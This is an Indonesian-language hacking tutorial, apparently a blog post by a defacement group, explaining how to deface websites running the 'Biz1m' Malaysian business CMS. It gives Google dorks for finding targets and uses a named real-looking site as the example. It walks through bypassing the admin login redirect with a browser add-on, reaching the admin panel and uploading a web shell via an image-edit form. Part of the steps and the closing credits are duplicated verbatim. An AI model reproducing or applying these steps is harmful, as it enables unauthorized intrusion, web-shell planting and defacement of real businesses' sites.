Deface CMS Biz1m (Bisnes 1 Malaysia) Upload Shell
 |
| Web Malaysia Yang Ane Deface |
Wkakaka. Karna faktor ketamvanan dan keberuntungan hasil deface ane jadi Viral coyy *Sombong:V
Oke. langsung aja.
Disini ane deface pake method Bypass Admin Noredirrect. Lalu Upload Shell.
Alat perang yang harus ente siapin yaitu:
1. Mozilla Firefox ( Pake versi yg gak lawas aja )
2. Addons Noredirrect ( Comot disini Nzeng )
3. Otak :V
Oke langsung cari aja Targetnya pake dork.
Karna ana baik, jadi ane kasih dah Dork kebanggaan ane :V
Intitle:"::Peluang buat bisnes"
Inurl:/?buka=admin
Inurl:/?buka=testimoni
Inurl:/?buka=berita
Silahkan dikembangkan ndiri :P
Oke langsung ke peroses nya aje :V
1. Dorking pake salah satu dork diatas.
 |
| Langkah Pertama 1. Dorking |
2. Pilih salah satu target.
Contoh disini gua pake target http://promosiauto.com
3. Lalu masukan Exploit admin login /admin-cp/logadmin.php di belakang url target
Misal ane pilih http://promosiauto.com trus ane tambahin exploit
Hasilnya akan menjadi http://promosiauto.com/admin-cp/logadmin.php
4. Sekarang masuk ke mozilla firefox. Akses web yang sudah diberi Exploit tadi dengan Mozilla Firefox :V
5. Kalo udah sekarang klik tombol alt. lalu lihat diatas (toolbar firefox) lalu pilih Tools > Noredirect
6. Di Noredirect kalian klik Add new. Nah nanti akan muncul kotak :V
Masukin target kalian tadi di kotak tersebut dengan menyertakan tanda "^" di depan target.
Contoh:" ^http://promosiauto.com/admin-cp/logadmin.php" (tanpa petik)
7. Sekarang klik Ok. Trus tinggal akses ke dashboard adminnya aja.
Silahkan akses Web tadi dengan menambahkan exploit baru. Yaitu admin-cp.php
Contoh: http://promosiauto.com/admin-cp.php
8. Tinggal upload Shell deh! Caranya kita exploit lagi dengan menambahkan
"admin-cp.php?buka=iklanvvip"
Contoh:http://promosiauto.com/admin-cp.php?buka=iklanvvip
9. Tinggal klik edit gambar, jedar jeder deh!
Akses Shell: www.target.com/images/shellkamu.php
Video bisa dilihat di: Disini :V
Judulnya: Deface Website New Method 2017 #SoraCyberTeam
Cari sendiri ye! Usaha! HAHAHAHA :"V
Jangan lupa diSubscribe :V
Instagram: @kasuganosora09_
Youtube : Cy#b3r00T
BBMC :C00452B05
4. Sekarang masuk ke mozilla firefox. Akses web yang sudah diberi Exploit tadi dengan Mozilla Firefox :V
5. Kalo udah sekarang klik tombol alt. lalu lihat diatas (toolbar firefox) lalu pilih Tools > Noredirect
6. Di Noredirect kalian klik Add new. Nah nanti akan muncul kotak :V
Masukin target kalian tadi di kotak tersebut dengan menyertakan tanda "^" di depan target.
Contoh:" ^http://promosiauto.com/admin-cp/logadmin.php" (tanpa petik)
7. Sekarang klik Ok. Trus tinggal akses ke dashboard adminnya aja.
Silahkan akses Web tadi dengan menambahkan exploit baru. Yaitu admin-cp.php
Contoh: http://promosiauto.com/admin-cp.php
8. Tinggal upload Shell deh! Caranya kita exploit lagi dengan menambahkan
"admin-cp.php?buka=iklanvvip"
Contoh:http://promosiauto.com/admin-cp.php?buka=iklanvvip
9. Tinggal klik edit gambar, jedar jeder deh!
Akses Shell: www.target.com/images/shellkamu.php
Video bisa dilihat di: Disini :V
Judulnya: Deface Website New Method 2017 #SoraCyberTeam
Cari sendiri ye! Usaha! HAHAHAHA :"V
Jangan lupa diSubscribe :V
Instagram: @kasuganosora09_
Youtube : Cy#b3r00T
BBMC :C00452B05